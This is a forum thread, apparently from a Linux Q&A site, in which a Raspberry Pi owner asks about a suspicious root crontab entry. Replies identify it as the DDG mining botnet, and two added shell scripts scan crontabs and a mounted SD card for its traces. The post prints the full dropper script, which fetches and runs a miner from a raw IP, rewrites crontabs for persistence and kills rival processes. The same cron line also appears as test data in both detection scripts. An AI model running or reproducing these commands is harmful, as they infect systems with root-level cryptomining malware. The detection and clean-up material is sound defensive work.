Suspicious crontab entry
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me; searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
security cron malware
asked 8 hours ago by Peter Dam
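Added here as an example, not code from the question or its answer: a small POSIX sh scanner for the shape this entry has, a cron job that fetches a script from a raw IP and pipes it straight into sh, with /tmp as one of the execution paths. It reads any crontab source (the `crontab -l` output of each user, /etc/crontab, /etc/cron.d/*, the spool files) and prints which indicator each line trips. The indicator names and regexes are this example's own choices, and the sample crontab is constructed test input that places the entry from the question next to entries a Pi might legitimately carry. A hit is a lead to inspect by hand, not proof of compromise.

```shell
#!/bin/sh
# Added example, not code from the question or answer: a heuristic scan of
# crontab text for the "fetch a script and pipe it into a shell" pattern the
# entry above shows. Works on any crontab source, e.g.
#   crontab -l | flag_cron_downloaders
#   flag_cron_downloaders /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*

# flag_cron_downloaders [FILE...]
# Reads crontab lines from FILE(s) or stdin, skips comments and blank lines,
# and prints "INDICATOR<TAB>LINE" for every indicator a line trips:
#   PIPE_TO_SHELL  curl/wget output piped straight into sh or bash
#   RAW_IP_URL     a URL naming a literal IPv4 address instead of a hostname
#   TMP_EXEC       a path under /tmp, /var/tmp or /dev/shm used as a command
# The indicator names and regexes are this example's own choices (assumed,
# not from the page); a hit is a lead to inspect, not proof of compromise.
flag_cron_downloaders() {
    cat "$@" | grep -Ev '^[[:space:]]*(#|$)' | while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'; then
            printf 'PIPE_TO_SHELL\t%s\n' "$line"
        fi
        if printf '%s\n' "$line" | grep -Eq 'https?://[0-9]{1,3}(\.[0-9]{1,3}){3}'; then
            printf 'RAW_IP_URL\t%s\n' "$line"
        fi
        if printf '%s\n' "$line" | grep -Eq '(^|[[:space:](|;&])/(tmp|var/tmp|dev/shm)/[^[:space:]]+'; then
            printf 'TMP_EXEC\t%s\n' "$line"
        fi
    done
    return 0
}

# flag_count [FILE...]: number of indicator rows (prints 0 when nothing is flagged).
flag_count() {
    flag_cron_downloaders "$@" | grep -c '' || true
}

# sample_crontab: constructed test input, the root crontab entry from the
# question next to three entries a Pi might legitimately carry.
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsS https://hc-ping.com/0000-constructed-id >/dev/null 2>&1
0 * * * * wget -qO- https://example.org/feed.xml | sha256sum >> /var/log/feed.log
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
@reboot /tmp/.x/run.sh
EOF
}

# Stand-alone run: the xribfa4 line trips all three indicators, the @reboot
# line trips TMP_EXEC, the three benign entries trip nothing.
sample_crontab | flag_cron_downloaders
```

The PIPE_TO_SHELL regex deliberately requires the shell to be the whole command after the pipe, so `wget ... | sha256sum` is not flagged while `... | sh` and `... | bash` are. Run it per user (`for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null; done | flag_cron_downloaders`) rather than only for root, since a dropper that could not get root would install the same entry under whatever account it had.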
5
It’s circular. Every 15 minutes it downloads and installs a fresh copy of itself. If/when the copy on the remote server is changed, all servers running this cronjob will execute whatever the new code is, within 15 minutes.
– Wildcard
7 hours ago
2
Is your Raspberry Pi open to the internet? What is your Raspberry Pi running? This is the only result on Google when I search for xribfa4. If you are not running software that needs to do this, then this is likely a virus.
– kemotep
7 hours ago
4
@kemotep that string is random, but google for the IP and it gives a few results. Something about a ddg mining botnet
– frostschutz
6 hours ago
2
I found it. It's crazy that the IP is registered to an Indonesian government site. Also, it looks like there are nearly 2000 other IPs delivering this payload.
– kemotep
6 hours ago
2
The main thing you must be aware of is that even if you remove that crontab entry, your system most likely still has the vulnerability that allowed it to be infected. You need to find and fix that vulnerability.
– Hans-Martin Mosner
4 hours ago
1 Answer
It is a DDG mining botnet. How it works:
- exploiting an RCE vulnerability
- modifying the crontab
- downloading the appropriate mining program (written in Go)
- starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
U&L: How can I kill minerd malware on an AWS EC2 instance? (compromised server)
answered 6 hours ago, edited 6 hours ago, by GAD3R
1
Yeah, it actually seems that this is it. Thanks! Will mark this as an answer, if nothing new comes up.
– Peter Dam
3 hours ago
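As an added example of the clean-up the answer's steps imply, not code from the answer or the DDG write-up it links: an offline sweep of a Raspberry Pi root filesystem for exactly this persistence. It assumes the SD card is mounted on a clean machine and passed as ROOT, because `ps`, `crontab -l` and `ls` on a box whose root account already runs attacker binaries are not the tool to settle the question with. The two indicators, the dropper's host:port and the binary name, are copied from the i.sh in the question and are hard-coded assumptions; other samples use other values. Two details of i.sh drive what the sweep looks at: it writes /var/spool/cron/root and /var/spool/cron/crontabs/root by hand and then also runs `crontab -`, so both spool layouts are checked for every user; and it `cd`s into the last of /usr/local/bin, /usr/libexec, /usr/bin in which it can create a file and downloads the miner there, so as root the binary ends up in /usr/bin, with /tmp as the cron line's fallback. The `make_fake_root` tree is constructed test data, not an image of a real card.

```shell
#!/bin/sh
# Added example, not code from the answer or the DDG write-up it links.
# Offline sweep of a Raspberry Pi root filesystem for the persistence that
# i.sh installs. Run it against the SD card mounted on a clean host, e.g.
#   sweep_ddg /mnt/sdcard
# rather than against the live box, whose root account the miner already owns.

# Indicators copied from the i.sh shown in the question (assumed constants;
# other DDG samples use other hosts and binary names).
DDG_HOST='103.219.112.66:8000'
DDG_BIN='xribfa4'

# sweep_ddg ROOT
# Prints one "KIND<TAB>PATH" row per hit under ROOT:
#   CRON  a crontab that references the dropper host or the binary name
#   BIN   the dropped binary in one of the four paths the cron entry tries
# Returns 1 if anything was found, 0 if the tree looks clean.
sweep_ddg() {
    root=${1:-/}
    found=0
    # i.sh writes /var/spool/cron/root and /var/spool/cron/crontabs/root
    # directly and then also runs `crontab -`, so check both spool layouts
    # plus the system crontabs, for every user, not just root.
    for f in "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/* \
             "$root"/etc/crontab "$root"/etc/cron.d/*; do
        [ -f "$f" ] || continue
        if grep -Fq -e "$DDG_HOST" -e "$DDG_BIN" "$f"; then
            printf 'CRON\t%s\n' "$f"
            found=1
        fi
    done
    # i.sh cd's into the last of /usr/local/bin, /usr/libexec, /usr/bin it
    # can create a file in and downloads the miner there; as root that is
    # /usr/bin. /tmp is the fallback the cron line also tries.
    for d in /usr/bin /usr/libexec /usr/local/bin /tmp; do
        if [ -f "$root$d/$DDG_BIN" ]; then
            printf 'BIN\t%s\n' "$root$d/$DDG_BIN"
            found=1
        fi
    done
    return "$found"
}

# make_fake_root
# Builds a throw-away tree that mimics an infected card (constructed test
# data: the cron line from the question, one benign cron.d entry, and an
# empty stand-in for the binary) and prints its path.
make_fake_root() {
    r=$(mktemp -d)
    mkdir -p "$r/var/spool/cron/crontabs" "$r/usr/bin" "$r/etc/cron.d"
    printf '%s\n' '*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh' \
        > "$r/var/spool/cron/crontabs/root"
    printf '0 3 * * * root /usr/bin/certbot renew --quiet\n' > "$r/etc/cron.d/certbot"
    : > "$r/usr/bin/xribfa4"
    printf '%s\n' "$r"
}

# Stand-alone run against the constructed tree: expect one CRON and one BIN row.
fake=$(make_fake_root)
if sweep_ddg "$fake"; then
    echo "clean"
else
    echo "infected: the rows above are what to remove; then find the entry point or reflash"
fi
rm -rf "$fake"
```

Deleting the rows it prints stops the 15-minute reinstall loop, but as the comment above notes, it does not close whatever let the dropper run as root in the first place. The code that ran had full control of the system, so the trustworthy path is to keep the card as evidence, reflash a fresh image, change every credential that was on the device, and only then work out how it got in (exposed service, default password, vulnerable web application) before putting it back online.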